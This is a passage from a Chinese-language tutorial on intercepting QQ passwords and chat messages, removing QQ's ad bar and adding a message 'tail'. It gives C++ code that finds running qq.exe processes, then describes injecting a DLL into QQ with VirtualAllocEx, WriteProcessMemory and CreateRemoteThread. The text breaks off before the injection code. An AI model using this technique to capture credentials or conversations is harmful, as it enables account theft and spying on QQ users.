如何截取QQ密码和聊天内容、去掉QQ广告栏、添加QQ尾巴

核心提示： //// 枚举出 “qq.exe”的进程//int EnumQQProcess ( CStringArray *pStrAry_ProcessName/*=NULL*/,CUIntArray *pUIntAry_ProcessID/*=NULL*/,CStringA

　　//
　　// 枚举出 “qq.exe”的进程
　　//
　　int EnumQQProcess ( CStringArray *pStrAry_ProcessName/*=NULL*/,
　　　　　　CUIntArray *pUIntAry_ProcessID/*=NULL*/,
　　　　　　CStringArray *pStrAry_ProcessPath/*=NULL*/ )
　　{
　　　　CStringArray StrAry_ProcessName;
　　　　CUIntArray UIntAry_ProcessID;
　　　　CStringArray StrAry_ProcessPath;
　　　　if ( !CProcessManage::EnumSystemProcess (
　　　　　　&StrAry_ProcessName,
　　　　　　&UIntAry_ProcessID,
　　　　　　NULL,
　　　　　　NULL,
　　　　　　&StrAry_ProcessPath
　　　　　　) )
　　　　{
　　　　　　return -1;
　　　　}
　　　　ASSERT ( StrAry_ProcessName.GetSize() == UIntAry_ProcessID.GetSize() );
　　　　ASSERT ( StrAry_ProcessName.GetSize() == StrAry_ProcessPath.GetSize() );
　　　　
　　　　int nCount = 0;
　　　　for ( int i=0; i<StrAry_ProcessName.GetSize(); i++ )
　　　　{
　　　　　　CString csProcessName = StrAry_ProcessName.GetAt ( i );
　　　　　　TRACE ( _T("%sn"), csProcessName );
　　　　　　csProcessName.MakeLower ();
　　　　　　if ( csProcessName == _T("qq.exe") )
　　　　　　{
　　　　　　　　nCount ++;
　　　　　　　　if ( pStrAry_ProcessName ) pStrAry_ProcessName->Add ( csProcessName );
　　　　　　　　if ( pUIntAry_ProcessID ) pUIntAry_ProcessID->Add ( UIntAry_ProcessID.GetAt(i) );
　　　　　　　　if ( pStrAry_ProcessPath ) pStrAry_ProcessPath->Add ( StrAry_ProcessPath.GetAt(i) );
　　　　　　}
　　　　}
　　　　
　　　　return nCount;
　　}

接下来我们使用函数VirtualAllocEx()/WriteProcessMemory()函数在QQ进程中申请内存空间，将我们的数据参数写入到QQ进程内存空间里，然后用CreateRemoteThread()函数在QQ进程空间中启动一个远程线程，将我们的dll执行在QQ进程空间中，如下函数既是：